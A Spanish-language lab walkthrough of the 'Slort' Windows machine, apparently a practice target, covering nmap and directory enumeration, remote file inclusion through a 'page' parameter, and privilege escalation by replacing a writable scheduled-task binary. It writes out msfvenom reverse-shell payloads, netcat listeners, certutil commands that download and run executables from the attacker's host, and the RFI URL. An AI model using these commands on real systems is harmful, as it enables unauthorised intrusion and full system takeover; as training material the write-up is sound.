Slort

Resumen

Información general

Nivel

Intermedio

Sistema

Windows

Spoiler! - Roadmap

Entre los servicios, se encuentra una aplicación web que cuenta con una ruta /site que redirige a /site/index.php?page=main.php.
En el parámetro page se encuentra que es vulnerable a RFI y se incluye por medio del parámetro una URL con nuestra reverse shell en php.
Se enumera el servidor y se encuentra en la carpeta C:\Backup la información de una tarea que ejecuta un binario llamado TFTP.exe cada 5 minutos y donde vemos que nuestro usuario tiene permisos para modificarlo.
Creamos un EXE con el mismo nombre que el fichero que se ejecuta en la tarea y lo sustituimos en el sistema.
Esperamos hasta que la tarea se ejecute y PWNED! }:)

Enumeración

Escáner con nmap

Enumeración básica de todos los servicios vía TCP, UDP y SCTP:

IP=192.168.198.53
nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP

Escáner de puertos y servicios con scripts del Top 1000 vía TCP y UDP, y todos los puertos vía TCP:

nmap -T4 -Pn -open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn -open -sU -sV -oA nmap/udp-1000 $IP

Resultados de nmap

El segundo escáner (nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP) nos da la siguiente información:

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| vulners: 
|   cpe:/a:filezilla-project:filezilla_server:0.9.41_beta: 
|       VMSA-2008-0016.3        10.0    https://vulners.com/vmware/VMSA-2008-0016.3
|       VMSA-2008-0014.3        10.0    https://vulners.com/vmware/VMSA-2008-0014.3
|       SSV:3950        10.0    https://vulners.com/seebug/SSV:3950     *EXPLOIT*
|       SSV:11998       10.0    https://vulners.com/seebug/SSV:11998    *EXPLOIT*
|       SAINT:D25EA3A9ECECCE0EAAD76756E80C2619  10.0    https://vulners.com/saint/SAINT:D25EA3A9ECECCE0EAAD76756E80C2619        *EXPLOIT*
|       SAINT:98424EE013ADB3A8F0D1BE842CCABF10  10.0    https://vulners.com/saint/SAINT:98424EE013ADB3A8F0D1BE842CCABF10        *EXPLOIT*
|       SAINT:630A6964630CDBFFE209380927EB5D13  10.0    https://vulners.com/saint/SAINT:630A6964630CDBFFE209380927EB5D13        *EXPLOIT*
|       SAINT:09352C87FBB0235129E935BA72121479  10.0    https://vulners.com/saint/SAINT:09352C87FBB0235129E935BA72121479        *EXPLOIT*
|       D2SEC_JAVAWS2   10.0    https://vulners.com/d2/D2SEC_JAVAWS2    *EXPLOIT*
|       VMSA-2009-0005  9.3     https://vulners.com/vmware/VMSA-2009-0005
|       VMSA-2008-0018  9.3     https://vulners.com/vmware/VMSA-2008-0018
|       SSV:5025        9.3     https://vulners.com/seebug/SSV:5025     *EXPLOIT*
|       SSV:5005        9.3     https://vulners.com/seebug/SSV:5005     *EXPLOIT*
|       SSV:4423        9.3     https://vulners.com/seebug/SSV:4423     *EXPLOIT*
|       VMSA-2009-0007  7.5     https://vulners.com/vmware/VMSA-2009-0007
|       SSV:3423        7.5     https://vulners.com/seebug/SSV:3423     *EXPLOIT*
|       SSV:3166        7.5     https://vulners.com/seebug/SSV:3166     *EXPLOIT*
|       PACKETSTORM:64260       7.5     https://vulners.com/packetstorm/PACKETSTORM:64260       *EXPLOIT*
|       VMSA-2008-0019.1        7.2     https://vulners.com/vmware/VMSA-2008-0019.1
|       SSV:4528        7.2     https://vulners.com/seebug/SSV:4528     *EXPLOIT*
|       SSV:3948        7.2     https://vulners.com/seebug/SSV:3948     *EXPLOIT*
|       VMSA-2009-0015  6.9     https://vulners.com/vmware/VMSA-2009-0015
|       SSV:4422        6.9     https://vulners.com/seebug/SSV:4422     *EXPLOIT*
|       SSV:14961       6.9     https://vulners.com/seebug/SSV:14961    *EXPLOIT*
|       SSV:12550       6.9     https://vulners.com/seebug/SSV:12550    *EXPLOIT*
|       SSV:12541       6.9     https://vulners.com/seebug/SSV:12541    *EXPLOIT*
|       VMSA-2009-0006  6.8     https://vulners.com/vmware/VMSA-2009-0006
|       SSV:12093       6.8     https://vulners.com/seebug/SSV:12093    *EXPLOIT*
|       CLOUDBURST      6.8     https://vulners.com/canvas/CLOUDBURST   *EXPLOIT*
|       SSV:9178        5.0     https://vulners.com/seebug/SSV:9178     *EXPLOIT*
|       SSV:9168        5.0     https://vulners.com/seebug/SSV:9168     *EXPLOIT*
|       SSV:9165        5.0     https://vulners.com/seebug/SSV:9165     *EXPLOIT*
|       SSV:86539       5.0     https://vulners.com/seebug/SSV:86539    *EXPLOIT*
|       SSV:65607       5.0     https://vulners.com/seebug/SSV:65607    *EXPLOIT*
|       SSV:3949        5.0     https://vulners.com/seebug/SSV:3949     *EXPLOIT*
|       SSV:17308       5.0     https://vulners.com/seebug/SSV:17308    *EXPLOIT*
|       PACKETSTORM:68500       5.0     https://vulners.com/packetstorm/PACKETSTORM:68500       *EXPLOIT*
|       PACKETSTORM:68473       5.0     https://vulners.com/packetstorm/PACKETSTORM:68473       *EXPLOIT*
|       PACKETSTORM:68471       5.0     https://vulners.com/packetstorm/PACKETSTORM:68471       *EXPLOIT*
|       EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF    5.0     https://vulners.com/exploitpack/EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF  *EXPLOIT*
|       EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D  *EXPLOIT*
|       EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095    5.0     https://vulners.com/exploitpack/EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095  *EXPLOIT*
|       EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D  *EXPLOIT*
|       EDB-ID:6130     5.0     https://vulners.com/exploitdb/EDB-ID:6130       *EXPLOIT*
|       EDB-ID:6123     5.0     https://vulners.com/exploitdb/EDB-ID:6123       *EXPLOIT*
|       EDB-ID:6122     5.0     https://vulners.com/exploitdb/EDB-ID:6122       *EXPLOIT*
|       E-193   5.0     https://vulners.com/dsquare/E-193       *EXPLOIT*
|       D2SEC_VMWARE_DIRTRAV    5.0     https://vulners.com/d2/D2SEC_VMWARE_DIRTRAV     *EXPLOIT*
|       D2SEC_VMWARE    5.0     https://vulners.com/d2/D2SEC_VMWARE     *EXPLOIT*
|       SSV:11498       4.0     https://vulners.com/seebug/SSV:11498    *EXPLOIT*
|_      SSV:3947        2.1     https://vulners.com/seebug/SSV:3947     *EXPLOIT*
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GenericLines, JavaRMI, LDAPBindReq, NULL: 
|_    Host '192.168.45.5' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:4443/dashboard/
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5040/tcp  open  unknown
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:8080/dashboard/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.198.53:8080/dashboard/javascripts/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.198.53:8080/dashboard/javascripts/?C=M%3BO%3DA%27%20OR%20sqlspider
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-open-proxy: Proxy might be redirecting requests
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=3/4%Time=64038037%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(JavaRMI,4B,"G\0
SF:\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/4%OT=21%CT=1%CU=43728%PV=Y%DS=3%DC=T%G=Y%TM=64038244
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=I%TS=U)OPS(O1=M54ENW8
OS:NNS%O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=99A7%RUD=G)IE(R=N)

Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb2-time: 
|   date: 2023-03-04T17:33:55
|_  start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Análisis del escáner

HTTP - 4443

Entre los servicios detectados, los servicios más comunes, como los servicios web, entre otros (ftp, smb, etc.), suelen ser los de mayor interés y se recomienda analizarlos antes.

http://192.168.198.53:4443/

Enumeración de directorios

Se enumeran los directorios y posibles ficheros con las extensiones html, php y txt utilizando el diccionario directory-list-2.3-medium.txt:

IP=192.168.198.53
feroxbuster -t 200 -L 2 -d 2 -u http:/$IP:4443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --extract-links -o $IP-directory-list-2.3-medium-443.txt -k

Al acceder a la ruta de /site se redirige a http://192.168.205.53:4443/site/index.php?page=main.php.

El parámetro page hace referencia a un documento que se encuentra almacenado en el servidor web, y podría ser posible que esta entrada no esté securizada, pudiendo ser vulnerable a LFI (Local File Inclusion | Inclusión de ficheros locales) o RFI (Remote File Inclusion | Inclusión de ficheros remotos).

Como nos sería mucho más útil un RFI, puesto que nos facilitaría poder ejecutar una webshell y/o reverse shell. Probamos primero si pudiera ser vulnerable a RFI.

Primero, probamos con una simple comilla, para observar cómo se comporta con esta entrada:

http://192.168.205.53:4443/site/index.php?page=%27

GET /site/index.php?page=%27 HTTP/1.1
Host: 192.168.205.53:4443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 21:20:55 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Content-Length: 316
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  include('): failed to open stream: No such file or directory in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>:  include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />

Efectivamente, el parámetro no se encuentra adecuadamente securizado y vemos que se utiliza la. función PHP include, por lo que vamos a probar a incluir un fichero que se encuentre en nuestro equipo (RFI). En concreto, crearemos una reverse shell y pondremos un puerto a la escucha.

Explotación

RFI - Inclusión remota de ficheros

Ahora que hemos encontrado un posible punto de entrada, creamos nuestra reverse shell.

Friendly reminder: Utilizar siempre que sea posible los puertos 53, 80 o 443. En estos puertos es menos probable que el firewall lo bloquee y tener éxito en la ejecución de la reverse shell.

msfvenom -p php/reverse_php LHOST=192.168.45.5 LPORT=443 -f raw > test.php

python3 -m http.server 80

sudo rlwrap nc -lnvp 443

http://192.168.205.53:4443/site/index.php?page=http://192.168.45.5/test.php

Y... PWNED! 8)

Ahora, para tener una cmd mejor, vamos a subir un EXE. Para ello, volvemos a utilizar msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.5 LPORT=53 -f exe > r.exe
python3 -m http.server 80

Ponemos el puerto 53 a la escucha:

sudo rlwrap nc -lnvp 53

Ejecutamos en la máquina víctima lo siguiente para descargar el EXE y posteriormente ejecutarlo.

certutil.exe -urlcache -split -f "http://192.168.45.5/r.exe"
r.exe

Al ejecutarlo, vemos como obtenemos una cmd mejor:

Escalada de privilegios

Antes de recurrir e enumeraciones automatizadas, echamos un vistazo rápido por el sistema y realizamos enumeraciones manuales.

Tarea programada cada 5 minutos

Al acceder a C:\ vemos una carpeta de Backup. Viendo la información de los ficheros, vemos que se ejecuta un EXE cada 5 minutos.

cd C:\ && dir
cd Backup && dir

Binario con permisos de escritura

type backup.txt
type info.txt

Vamos a ver los permisos de ese ejecutable por si pudiéramos tener permisos de escritura para sustituirlo por un ejecutable creado por nosotros.

powershell -c "Get-Acl TFTP.exe | fl"

Creación de binario malicioso

Como tenemos permisos para poder modificar el fichero, creamos un fichero llamado TFTP.exe con msfvenom que contenga nuestra reverse shell y posteriormente lo sustituiremos por el que se encuentra en el sistema.

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.45.5 LPORT=80 -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o TFTP.exe

Sustitución y subida del binario malicioso

En la máquina de la víctima, renombramos el fichero TFTP.exe a TFTP.exe.bak para no eliminarlo y descargamos nuestro EXE malicioso.

move TFTP.exe TFTP.exe.bak
certutil.exe -urlcache -split -f "http://192.168.45.5/TFTP.exe"

Recordamos cerrar nuestro python que se encuentra con el servicio HTTP para la descarga del EXE. Y ponemos el puerto 80 a la escucha para obtener nuestra shell:

sudo rlwrap nc -lnvp 80

Esperamos 5 minutos y... PWNED!

type C:\Users\rupert\Desktop\local.txt
type C:\Users\Administrator\Desktop\proof.txt

AnteriorNickel SiguientePortSwigger Academy

Última actualización hace 9 meses

¿Te fue útil?

hashtagResumen

hashtagInformación general

hashtagSpoiler! - Roadmap

hashtagEnumeración

hashtagEscáner con nmap

hashtagResultados de nmap

hashtagAnálisis del escáner

hashtagHTTP - 4443

hashtagEnumeración de directorios

hashtagExplotación

hashtagRFI - Inclusión remota de ficheros

hashtagEscalada de privilegios

hashtagTarea programada cada 5 minutos

hashtagBinario con permisos de escritura

hashtagCreación de binario malicioso

hashtagSustitución y subida del binario malicioso

Resumen

Información general

Spoiler! - Roadmap

Enumeración

Escáner con nmap

Resultados de nmap

Análisis del escáner

HTTP - 4443

Enumeración de directorios

Explotación

RFI - Inclusión remota de ficheros

Escalada de privilegios

Tarea programada cada 5 minutos

Binario con permisos de escritura

Creación de binario malicioso

Sustitución y subida del binario malicioso